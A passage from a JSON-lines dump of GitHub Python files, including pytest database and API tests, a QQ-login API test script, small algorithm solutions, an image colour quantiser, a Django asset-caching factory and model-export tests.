mocker.patch(\"covalent_dispatcher._db.datastore.Config\")\n\n def alembic_config_init(self, provided_path):\n # ensure provided path matches project root / alembic.ini\n assert provided_path == Path(path.join(__file__, \"./../../../../alembic.ini\")).resolve()\n\n mocker.patch.object(Config, \"__init__\", alembic_config_init)\n assert db.get_alembic_config() == config_mock()\n\n\n@pytest.mark.usefixtures(\"workflow_fixture\")\ndef test_insertion(db: DataStore, workflow_fixture):\n electron_dependency = workflow_fixture[\"electron_dependency\"][0]\n with db.session() as session:\n session.add(electron_dependency)\n session.commit()\n with db.session() as session:\n statement = select(models.ElectronDependency)\n results = session.execute(statement).all()\n assert len(results) == 1\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/covalent_dispatcher_tests/_db/db_test.py","file_name":"db_test.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"} +{"seq_id":"33619869162","text":"import pytest\n\nimport json\n\n\n@pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.projects (name, key, tanker_project,\n tanker_keyset, intent)\n VALUES ('project_name_test', 'project_key_test', 'tanker_project_test',\n 'tanker_keyset_test', 'intent_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.templates (name, key, project_id,\n transport_type, waiting_condition, ttl)\n VALUES ('template_name_test', 'template_key_test', 1, 0, 'sent', 0)\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications (token, status,\n project_id, template_id, user_id, application, user_device_id,\n notification_params, message_title, message_body, deeplink,\n api_response, request, message_id, client_type, sent_at,\n sent_transport_type, personal_phone_id)\n VALUES ('test_token', 'skipped', 1, 1, 'test_user_id',\n 'test_application', 'test_user_device_id', '{}',\n 'test_message_title', 'test_message_body', 'test_deeplink',\n 'test_api_response', 'test_request', 'test_message_id',\n 'client-notify', '2021-07-28T18:00:00+00:00', 'push',\n 'personal_phone_id_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.user_devices\n (user_id, auth_token, active, device_id, model, brand)\n VALUES ('test_user_id', 'x_taxi_session_value', TRUE,\n 'test_user_device_id', 'model_test', 'brand_test'),\n ('test_user_id_2', 'x_taxi_session_value_1', FALSE,\n 'test_user_device_id', 'model_test', 'brand_test')\n \"\"\",\n ],\n)\n@pytest.mark.parametrize(\n 'request_json', [pytest.param({'tokens': ['test_token']})],\n)\nasync def test_200(taxi_eats_notifications, taxi_config, request_json):\n # get history\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history', json=request_json,\n )\n assert response.status_code == 200\n assert len(response.json()['notifications']) == 1\n assert (\n response.json()['notifications'][0]['application']\n == 'test_application'\n )\n assert (\n response.json()['notifications'][0]['client_type'] == 'client-notify'\n )\n assert response.json()['notifications'][0]['deeplink'] == 'test_deeplink'\n assert (\n response.json()['notifications'][0]['message_body']\n == 'test_message_body'\n )\n assert (\n response.json()['notifications'][0]['message_id'] == 'test_message_id'\n )\n assert (\n response.json()['notifications'][0]['message_title']\n == 'test_message_title'\n )\n assert (\n response.json()['notifications'][0]['sent_at']\n == '2021-07-28T18:00:00+00:00'\n )\n assert response.json()['notifications'][0]['status'] == 'skipped'\n assert response.json()['notifications'][0]['token'] == 'test_token'\n assert response.json()['notifications'][0]['user_id'] == 'test_user_id'\n assert (\n response.json()['notifications'][0]['device']\n == 'brand_test model_test'\n )\n assert (\n response.json()['notifications'][0]['personal_phone_id']\n == 'personal_phone_id_test'\n )\n assert response.json()['notifications'][0]['transport_type'] == 'push'\n\n\n@pytest.mark.parametrize(\n 'body_tags, expected_result',\n [\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {\n 'notification_token-1': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-2'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n 'notification_token-3': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-1'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n },\n marks=[\n pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.notifications_tags\n (key, value, notification_token, updated_at)\n VALUES ('order_id', 'order_id-123', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-2', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-321', 'notification_token-2', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-123', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-4', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-1', 'notification_token-3', '2021-07-28T18:00:00+00:00');\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications \n (token, status, notification_params, message_title, message_body, sent_at)\n VALUES ('notification_token-1', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-2', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-3', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-4', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00')\n \"\"\",\n ],\n ),\n ],\n id='Filtering',\n ),\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {},\n id='No tokens found',\n ),\n ],\n)\nasync def test_find_history_by_tags(\n taxi_eats_notifications, pgsql, expected_result, body_tags,\n):\n body = {'tags': body_tags}\n\n expected_tokens = expected_result.keys()\n\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history-by-tags', json=body,\n )\n assert response.status_code == 200\n\n notifications = response.json()['notifications']\n\n tokens = [item['notification']['token'] for item in notifications]\n assert sorted(tokens) == sorted(expected_tokens)\n\n for item in notifications:\n token = item['notification']['token']\n expected_tags = expected_result[token]['expected_tags']\n assert sorted(item['tags'], key=lambda x: x['value']) == sorted(\n expected_tags, key=lambda x: x['value'],\n )\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_notifications/test_notification_history.py","file_name":"test_notification_history.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43169901848","text":"# _*_ coding:utf-8 _*_\r\nimport requests\r\nfrom Scripts.ConfigFile import *\r\nfrom Scripts.GetCurrentTime import *\r\nfrom Scripts.GetReport import *\r\n\r\n\r\nclass QQLogin:\r\n def qq_login(self, openid):\r\n \"\"\"\r\n QQ登录\r\n :param openid:\r\n :return:\r\n \"\"\"\r\n post_data = {\"type\": \"qq\", # QQ: 'qq'; 微信: 'weixin'\r\n \"openid\": openid, # 第三方平台的唯一标识\r\n \"auth_token\": \"\" # 第三方平台的授权码\r\n }\r\n headers = {\"Cache - Control\": \"no - cache\",\r\n \"Content - Type\": \"text / html;charset = UTF - 8\",\r\n 'Accept': 'application/json',\r\n \"Date\": \"%s\" % GetCurrentTime().getHeaderTime(),\r\n \"Proxy - Connection\": \"Keep - alive\",\r\n \"Server\": \"nginx / 1.9.3(Ubuntu)\",\r\n \"Transfer - Encoding\": \"chunked\"}\r\n third_login_url = \"http://%s/user/thirdlogin\" % ConfigFile().host()\r\n request = requests.post(third_login_url, data=post_data, headers=headers)\r\n time = GetCurrentTime().getCurrentTime()\r\n status_code = request.status_code\r\n try:\r\n if status_code in (200, 422):\r\n json = request.json()\r\n info = json[\"info\"]\r\n return json\r\n else:\r\n info = request.reason\r\n finally:\r\n log_list = [u'QQ登录', u\"post\", third_login_url, str(post_data), time, status_code, info]\r\n GetReport().get_report() # 生成或打开日志文件\r\n GetReport().record_into_report(log_list) # 逐条写入日志\r\n\r\n\r\nif __name__ == \"__main__\":\r\n r = QQLogin()\r\n print(r.qq_login(\"openid\"))\r\n","repo_name":"AbigaleLiu/WuKongDianJing","sub_path":"Scripts/APIScripts/Other/QQLogin.py","file_name":"QQLogin.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"402293509","text":"def maxRotateFunction(nums) -> int:\n # from given pattern\n # derived the formula for F(k) as follows\n # F(k) = F(k-1) + SUM + N * arr[N - k]\n\n n = len(nums)\n S = sum(nums)\n\n prefixSum = 0\n for i, val in enumerate(nums):\n prefixSum += (i * val)\n\n maxVal = prefixSum\n for i in range(1, n):\n prefixSum = prefixSum + S - (n * nums[-i])\n maxVal = max(maxVal, prefixSum)\n\n return maxVal\n\n\nn1 = [4, 3, 2, 6]\nn2 = [100]\n\nprint(maxRotateFunction(n1))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Microsoft_Company_1/RotateFunction.py","file_name":"RotateFunction.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22923116043","text":"from math import sqrt\n\nclass Solution:\n # @param A : integer\n # @return a list of integers\n def sieve(self, A):\n if A < 2:\n return []\n check_primes = [1]* A\n check_primes.append(1)\n \n primes = []\n primes.append(2)\n primes.append(3)\n primes.append(5)\n primes.append(7)\n primes.append(11)\n \n sqa = int(sqrt(A))\n for i in xrange(3, sqa+1, 2):\n if check_primes[i] ==1:\n for j in xrange(i*i, A+1, i): # start at square of current prime as an optimization\n check_primes[j] = 0\n primes.append(i)\n next = sqa if sqa % 2 == 1 else sqa+1\n for i in xrange(next, A+1, 2):\n if check_primes[i] == 1:\n primes.append(i)\n return primes\n \n def primesum(self, A):\n primes = self.sieve(A)\n set_primes = set(primes)\n for i in primes:\n if A-i in set_primes:\n return (i, A-i)\n return []\n","repo_name":"rsubbu55/coding-prep","sub_path":"i-b/math/prime-sum.py","file_name":"prime-sum.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43316076024","text":"from tkinter import *\nimport re\n\n\nroot = Tk()\nroot.minsize(800, 600)\ntext = Text(root, width=800//10, height=600//20)\n\n#re.sub('[ES]', 'a', s)\ndef writeOut():\n global text\n words = text.get(\"1.0\",\"end-1c\")\n new_words = []\n hyphenated_words = re.findall(r\"\\w+(?:- \\S+\\w+)+\", words)\n for x in hyphenated_words:\n nx = x.replace(\"- \", \"\")\n words = words.replace(x, nx)\n print(words)\n\n## print(type(hyphenated_words))\n## print(re.search(r\"\\w+(?:- \\S+\\w+)+\", words).group(0))\n #print(re.sub(r\"\\w+(?:- \\S+\\w+)+\", \"\\b\", words))\n f = open(\"output.txt\", \"w\")\n f.write(text.get(\"1.0\",\"end-1c\"))\n f.close()\n\n\n\n\nB = Button(root, text=\"Format And Writeout\", command=writeOut)\nB.place(x = 800//2, y = 600//3)\ntext.pack()\nB.pack()\nroot.mainloop()\n","repo_name":"vasunep0306/antihiphen","sub_path":"perfect_formatter.py","file_name":"perfect_formatter.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12407933048","text":"from __future__ import annotations\n\nfrom psycopg2.extras import DictCursor\n\nfrom wazo_agid import agid\nfrom xivo_dao.resources.conference import dao as conference_dao\n\n\ndef incoming_conference_set_features(\n agi: agid.FastAGI, cursor: DictCursor, args: list[str]\n) -> None:\n conference_id = int(agi.get_variable('XIVO_DSTID'))\n\n try:\n conference = conference_dao.get(conference_id)\n except ValueError as e:\n agi.dp_break(str(e))\n\n menu = 'xivo-default-user-menu'\n user_profile = f'xivo-user-profile-{conference.id}'\n if conference.pin:\n for _ in range(4):\n agi.answer()\n pin = agi.get_data('conf-getpin', 10000, 80)\n if pin == conference.pin:\n break\n elif pin == conference.admin_pin:\n menu = 'xivo-default-admin-menu'\n user_profile = f'xivo-admin-profile-{conference.id}'\n break\n else:\n agi.stream_file('conf-invalidpin')\n else:\n agi.dp_break(\n 'Unable to join the conference room, wrong pin'\n f'(conference_id: {conference.id}, name: {conference.name})'\n )\n\n agi.set_variable('WAZO_CONFBRIDGE_ID', conference.id)\n agi.set_variable('WAZO_CONFBRIDGE_TENANT_UUID', conference.tenant_uuid)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_BRIDGE_PROFILE', f'xivo-bridge-profile-{conference.id}'\n )\n agi.set_variable('WAZO_CONFBRIDGE_USER_PROFILE', user_profile)\n agi.set_variable('WAZO_CONFBRIDGE_MENU', menu)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_PREPROCESS_SUBROUTINE', conference.preprocess_subroutine or ''\n )\n agi.appexec('CELGenUserEvent', f'WAZO_CONFERENCE, NAME: {conference.name or \"\"}')\n\n\nagid.register(incoming_conference_set_features)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"wazo_agid/modules/incoming_conference_set_features.py","file_name":"incoming_conference_set_features.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38373921898","text":"import numpy as np\nimport cv2 as cv\nimport operator\nfrom heapq import nlargest\n\nclass kdTree():\n\tdef __init__(self, rootid):\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.rootid = rootid\n\ndef get_leaf_nodes(node):\n\tleafs = []\n\tif node is not None:\n\t\tif node.left is None and node.right is None:\n\t\t\tleafs.append(node.rootid)\n\t\tleafs += get_leaf_nodes(node.left) + get_leaf_nodes(node.right)\n\treturn leafs\n\ndef readImage(imgName):\n\timg = cv.imread(imgName)\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[0])):\n\t\t\timg[i][j] = img[i][j]/8\n\t\t\timg[i][j] = img[i][j]*8\n\treturn img\n\ndef calHistogram(img):\n\thistogram = {}\n\tfor row in img:\n\t\tfor pixel in row:\n\t\t\tif (pixel[0], pixel[1], pixel[2]) in histogram:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] += 1\n\t\t\telse:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] = 0\n\treturn histogram\n\ndef showImage(name):\n\tcv.imshow('Quantised Image', name)\n\tk = cv.waitKey(0)\n\tif k == 27:\n\t\tcv.destroyAllWindows()\n\ndef growTree(points, k):\n\n\tif k == 1:\n\t\treturn None\n\n\tvar = (np.var(points, axis=0)).tolist()\n\tind = var.index(max(var))\n\tmed = (np.median(points, axis=0))[ind]\n\n\troot = kdTree(med)\n\tleft = [x for x in points if x[ind] < med]\n\tright = [x for x in points if x[ind] >= med]\n\n\tif k/2 != 1:\n\t\troot.left = growTree(left, k/2)\n\t\troot.right = growTree(right, k-k/2)\n\telse:\n\t\tavg = [0,0,0]\n\t\tfor i in range(0, len(points)):\n\t\t\t\tavg += points[i]\n\t\tavg = avg/float(len(points))\n\n\t\troot.rootid = avg\n\n\treturn root\n\ndef findKColors(image, K):\n\tlst = []\n\tfor i in range(0, len(image)):\n\t\tfor j in range(0, len(image[0])):\n\t\t\tlst.append(image[i][j])\n\ttree = growTree( lst , K)\n\n\tkColors = get_leaf_nodes(tree)\n\n\treturn kColors\n\ndef findDist(pixel, color):\n\td = 0\n\tfor i in range(len(pixel)):\n\t\td += (int(pixel[i]) - int(color[i]))**2\n\treturn d\n\ndef quantise(k_colors, histogram):\n\tlookUpt = {}\n\ti=0\n\tfor h in histogram.keys():\n\t\tminD = findDist(h, k_colors[0])\n\t\tval = k_colors[0]\n\t\tfor color in k_colors:\n\t\t\td = findDist(h, color)\n\t\t\tif d < minD:\n\t\t\t\tminD = d\n\t\t\t\tval = color\n\t\tlookUpt[h] = val\n\t\ti += 1\n\treturn lookUpt\n\ndef createFinalImage(img, lookUpt):\n\tfinalImg = img\n\tfor i in range(len(finalImg)):\n\t\tfor j in range(len(finalImg[0])):\n\t\t\tfinalImg[i][j] = lookUpt[(finalImg[i][j][0], finalImg[i][j][1], finalImg[i][j][2])]\n\treturn finalImg\n\nimage_path = input(\"Path to image: \")\nk = int(input(\"Quantisation level: \"))\n\nimage = readImage(image_path)\nhistogram = calHistogram(image)\nk_colors = findKColors(image, k)\nlookUpt = quantise(k_colors, histogram)\nfinalImg = createFinalImage(image, lookUpt)\nshowImage(finalImg)\n\n# # r = []\n# # g = []\n# # b = []\n# # for i in range(0, len(finalImg)):\n# # \tfor j in range(0, len(finalImg[0])):\n# # \t\tr.append(finalImg[0])\n# # \t\tg.append(finalImg[1])\n# # \t\tb.append(finalImg[2])\n\t\t\n# Hdat = []\n# Ldat = []\n# Sdat = [] \n# for row in finalImg:\n# \tfor pixel in row:\n# \t\th,l,s = colorsys.rgb_to_hls(pixel[0]/255., pixel[1]/255., pixel[2]/255.)\n# \t\tHdat.append(int(h*255.))\n# \t\tLdat.append(int(l*255.))\n# \t\tSdat.append(int(s*255.))\n\n# r.putdata(Hdat)\n# g.putdata(Ldat)\n# b.putdata(Sdat)\n# newimg = Image.merge('RGB',(r,g,b))\n# newimg.save('lenaHSV.png')","repo_name":"harsimrats/COL783","sub_path":"1/1b.py","file_name":"1b.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42834493394","text":"import io\nimport re\nimport json\nimport shutil\nimport tempfile\nimport os.path\n\nfrom django.core.validators import validate_email\nfrom rest_framework.exceptions import NotFound\n\nimport analitico\nimport analitico.plugin\nimport analitico.utilities\n\nfrom analitico.factory import Factory\n\nimport api.models\nimport api.plugin\n\n# import plugins for Supermercato24 (if available)\nimport s24.plugin # NOQA\n\n# pylint: disable=no-member\n\n\n##\n## ServerFactory\n##\n\n# analitico://item_type/item_id/asset_class/asset_id, eg: analitico://dataset/ds_xxx/assets/data.csv\nANALITICO_ASSET_RE = (\n r\"analitico:\\/\\/(?P[\\a-z]+)s\\/(?P[\\w]+)\\/(?Pdata|assets)\\/(?P[-\\w\\.]+)\"\n)\n\n\nclass ServerFactory(Factory):\n \"\"\" A factory used to run notebooks and plugins in the context of a server with direct access to items via SQL \"\"\"\n\n def __init__(self, job=None, mkdtemp=True, **kwargs):\n super().__init__(**kwargs)\n if job:\n self.set_attribute(\"job\", job)\n # special temp directory which is deleted automatically?\n if mkdtemp:\n self._temp_directory = tempfile.mkdtemp(prefix=\"analitico_temp_\")\n\n ##\n ## Temp and cache directories\n ##\n\n # Temporary directory which is deleted when factory is disposed\n _temp_directory = None\n\n def get_temporary_directory(self):\n \"\"\" Temporary directory is deleted when ServerFactory is disposed \"\"\"\n return self._temp_directory if self._temp_directory else super().get_temporary_directory()\n\n def get_artifacts_directory(self):\n \"\"\" Artifacts directory is a subdirectory of temporary and is deleted automatically \"\"\"\n artifacts_dir = os.path.join(self.get_temporary_directory(), \"artifacts\")\n if not os.path.isdir(artifacts_dir):\n os.mkdir(artifacts_dir)\n return artifacts_dir\n\n ##\n ## URL retrieval, authorization and caching\n ##\n\n def get_cache_asset(self, item, asset_class, asset_id):\n \"\"\" \n Returns filename of cached asset after downloading it if necessary. \n File should be used as read only and copied if it needs to be modified.\n \"\"\"\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n assert asset\n # name of the file in cache is determined by its hash so all files are unique and\n # we do not need to check versions, eg. if we have it with the correct name it's\n # the correct version and we can save a rountrip to check with the server\n storage_file = self.get_cache_filename(asset[\"hash\"])\n\n # if not in cache already download it from storage\n if not os.path.isfile(storage_file):\n storage = item.storage\n assert storage\n _, storage_stream = storage.download_object_via_stream(asset[\"path\"])\n _, storage_file = self.get_cached_stream(storage_stream, asset[\"hash\"])\n return storage_file\n\n def get_url_stream(self, url, binary=False):\n \"\"\" Job runner retrieves assets directly from cloud storage while using super for regular URLs \"\"\"\n # temporarily while all internal urls are updated prepend analitico://\n if url.startswith(\"workspaces/ws_\"):\n url = \"analitico://\" + url\n\n # job runner reads assets straight from cloud storage\n match = re.search(ANALITICO_ASSET_RE, url)\n if match:\n # find asset indicated in the url\n item_id = match.group(\"item_id\")\n asset_class = match.group(\"asset_class\")\n asset_id = match.group(\"asset_id\")\n\n # TODO should check that current requestor has access rights to this item\n item = self.get_item(item_id)\n\n # replace shorthand /data/csv with /data/data.csv\n wants_json = False\n if asset_class == \"data\":\n if asset_id == \"csv\":\n asset_id = \"data.csv\"\n if asset_id == \"info\":\n asset_id = \"data.csv\"\n wants_json = True\n\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n if wants_json:\n # format the same way as if it was returned by the server\n asset_json = json.dumps({\"data\": asset})\n return io.StringIO(asset_json)\n cache_filename = self.get_cache_asset(item, asset_class, asset_id)\n return open(cache_filename, \"rb\")\n # base class handles regular URLs\n return super().get_url_stream(url)\n\n def upload_artifacts(self, item):\n \"\"\" Uploads all files in the artifacts directory to the given item's data assets \"\"\"\n directory = self.get_artifacts_directory()\n for path in os.listdir(directory):\n fullpath = os.path.join(directory, path)\n # process only files (skip directories and .info files)\n if os.path.isfile(fullpath) and not path.endswith(\".info\"):\n path_size = os.path.getsize(fullpath)\n with open(fullpath, \"rb\") as f:\n # if asset has a .info companion read as extra info on the asset\n extras_path = fullpath + \".info\"\n extras = analitico.utilities.read_json(extras_path) if os.path.isfile(extras_path) else {}\n if fullpath.endswith(\".csv\") and \"rows\" not in extras:\n extras[\"rows\"] = analitico.utilities.get_csv_row_count(fullpath)\n # upload asset and extras, item will take care of saving to database\n item.upload_asset_stream(f, \"data\", path, path_size, None, path, extras)\n\n def restore_artifacts(self, item, artifacts_path=None, symlink=True):\n \"\"\" Restores artifacts stored by item to the artifacts directory \"\"\"\n assets = item.get_attribute(\"data\")\n if not assets:\n self.warning(\"ServerFactory.restore_artifacts - item '%s' has no artifacts\", item.id, item=item)\n return\n if not artifacts_path:\n artifacts_path = self.get_artifacts_directory()\n for asset in assets:\n cache_path = self.get_cache_asset(item, \"data\", asset[\"id\"])\n artifact_path = os.path.join(artifacts_path, asset[\"id\"])\n if symlink:\n # when running locally we can symlink files and save time\n os.symlink(cache_path, artifact_path)\n else:\n # when building docker images we need to really copy the files\n shutil.copyfile(cache_path, artifact_path)\n\n ##\n ## Log methods\n ##\n\n def _prepare_log(self, msg, *args, **kwargs):\n \"\"\" Add contextual items to the log record \"\"\"\n msg, args, kwargs = super()._prepare_log(msg, *args, **kwargs)\n for item_name in (\"endpoint\", \"token\", \"job\", \"request\"):\n item = self.get_attribute(item_name, None)\n if item:\n kwargs[\"extra\"][item_name] = item\n return msg, args, kwargs\n\n ##\n ## Factory methods\n ##\n\n def get_item(self, item_id):\n \"\"\" Loads a model from database given its id whose prefix determines the model type, eg: ws_xxx for Workspace. \"\"\"\n # TODO limit access to objects available with request credentials\n assert isinstance(item_id, str), \"Factory.get_item - item_id should be a string with a valid item identifier\"\n try:\n if item_id.startswith(analitico.DATASET_PREFIX):\n return api.models.Dataset.objects.get(pk=item_id)\n if item_id.startswith(analitico.ENDPOINT_PREFIX):\n return api.models.Endpoint.objects.get(pk=item_id)\n if item_id.startswith(analitico.JOB_PREFIX):\n return api.models.Job.objects.get(pk=item_id)\n if item_id.startswith(analitico.MODEL_PREFIX):\n return api.models.Model.objects.get(pk=item_id)\n if item_id.startswith(analitico.NOTEBOOK_PREFIX):\n return api.models.Notebook.objects.get(pk=item_id)\n if item_id.startswith(analitico.RECIPE_PREFIX):\n return api.models.Recipe.objects.get(pk=item_id)\n if item_id.startswith(analitico.WORKSPACE_PREFIX):\n return api.models.Workspace.objects.get(pk=item_id)\n if item_id.startswith(analitico.AUTOML_PREFIX):\n return api.models.Automl.objects.get(pk=item_id)\n except Exception as exc:\n self.warning(\"get_item: could not find item %s\", item_id)\n raise exc\n try:\n validate_email(item_id)\n return api.models.User.objects.get(email=item_id)\n except validate_email.ValidationError:\n pass\n self.warning(\"get_item: could not find item type for %s\", item_id)\n raise NotFound(\"ServerFactory.get_item - could not find given item type \" + item_id)\n\n ##\n ## with Factory as: lifecycle methods\n ##\n\n def __exit__(self, exception_type, exception_value, traceback):\n \"\"\" Delete any temporary files upon exiting \"\"\"\n if self._temp_directory:\n shutil.rmtree(self._temp_directory, ignore_errors=True)\n\n\n# shared instance of server side factory\nfactory = ServerFactory()\n","repo_name":"analitico/analitico","sub_path":"source/api/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18251624484","text":"from flask import render_template\nfrom app import app\nfrom urllib import request, parse\nimport json\n\n\n@app.route('/')\ndef index():\n title = \"Flask -- Working with Apis and json data\"\n\n requestVariables = {\n \"api_key\": '22f3e85e05becdb7e502c1f391dbd90d',\n 'limit': '10'\n }\n\n encodeVars = parse.urlencode(requestVariables)\n API_BASE_URL = 'https://api.themoviedb.org/3/movie/popular?'\n req_open = request.urlopen(API_BASE_URL + encodeVars)\n req_read = req_open.read()\n req_json = json.loads(req_read)\n movies = req_json['results']\n # img = 'https://image.tmdb.org/t/p/w500/'+ poster_path\n\n return render_template('index.html', title=title, movies=movies)\n","repo_name":"otienosteve/python_api_call-no-frameworks-used","sub_path":"John-Njau/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20121357402","text":"#!/usr/bin/python3\n\nimport pygame\nfrom yogini import Yogini\nimport sequences\n\nsuccesses, failures = pygame.init()\n\nscreen = pygame.display.set_mode((1280, 720))\n# screen = pygame.display.set_mode((0, 0), pygame.RESIZABLE)\nclock = pygame.time.Clock()\nFPS = 60\n\n# create the yogini\nyogini = Yogini()\nssize = pygame.display.get_surface().get_size()\nyogini.body.pos = [ssize[0] / 2, ssize[1] / 2]\nyogini.sequence = sequences.ashtanga\n\ntime = 0\n\nrunning = True\nwhile running:\n # Returns milliseconds between each call to 'tick'. The convert time to seconds.\n dt = clock.tick(FPS) / 1000\n time += dt\n screen.fill((255, 218, 148)) # Fill the screen with background color.\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.VIDEORESIZE:\n yogini.body.pos = [event.w / 2, event.h / 2]\n\n # let the yogini live\n yogini.live(time)\n\n # ...and draw it\n yogini.draw(screen)\n\n pygame.display.update()\n\nprint(\"Exited the game loop. Game will quit...\")\n","repo_name":"simon123h/pyogini","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29305517641","text":"\"\"\"djangomom URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^projects/', include('project.urls',\n namespace='projects')),\n url(r'^apps/', include('app.urls',\n namespace='apps')),\n url(r'^models/', include('modeller.urls',\n namespace='models')),\n url(r'^account/', include('account.urls',\n namespace='account')),\n url(r'^', include('core.urls',\n namespace='core')),\n url(r'^endpoint/', include('endpoint.urls',\n namespace='endpoint')),\n url(r'^serializer/', include('serializer.urls',\n namespace='serializer')),\n]\n","repo_name":"emiamar/djangomom","sub_path":"djangomom/djangomom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38522014574","text":"import cv2\nimport os\n\n\ndef remove_blurry_images(src_folder):\n img_names_list = os.listdir(src_folder)\n\n for img in img_names_list:\n if img.endswith('.jpeg'):\n img2 = cv2.imread(src_folder+img, cv2.IMREAD_GRAYSCALE)\n laplacian_var = cv2.Laplacian(img2, cv2.CV_64F).var()\n if laplacian_var < 10:\n print(img + \" :Image blurry\")\n os.remove(src_folder+img)\n\nremove_blurry_images(src_folder = '../processed_299_299/')","repo_name":"rishabkatta/Diabetic-Retinopathy-Detection","sub_path":"preprocessing_scripts/remove_blurry_images.py","file_name":"remove_blurry_images.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6183891636","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport fiona\nimport rasterio\nfrom shapely.geometry import box\nimport pytest\nfrom gisutils import shp2df\nfrom mfexport.list_export import mftransientlist_to_dataframe\nfrom mfexport.inputs import export, summarize\nfrom .test_results_export import check_files, compare_polygons\n\n\ndef test_model_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_packages_export(model):\n m, grid, output_path = model\n packages = ['dis'] # 'wel'\n outfiles = export(m, grid, packages[0], output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['thickness', 'top', 'botm']\n layers = list(range(get_nlay(m)))\n if m.version == 'mf6':\n 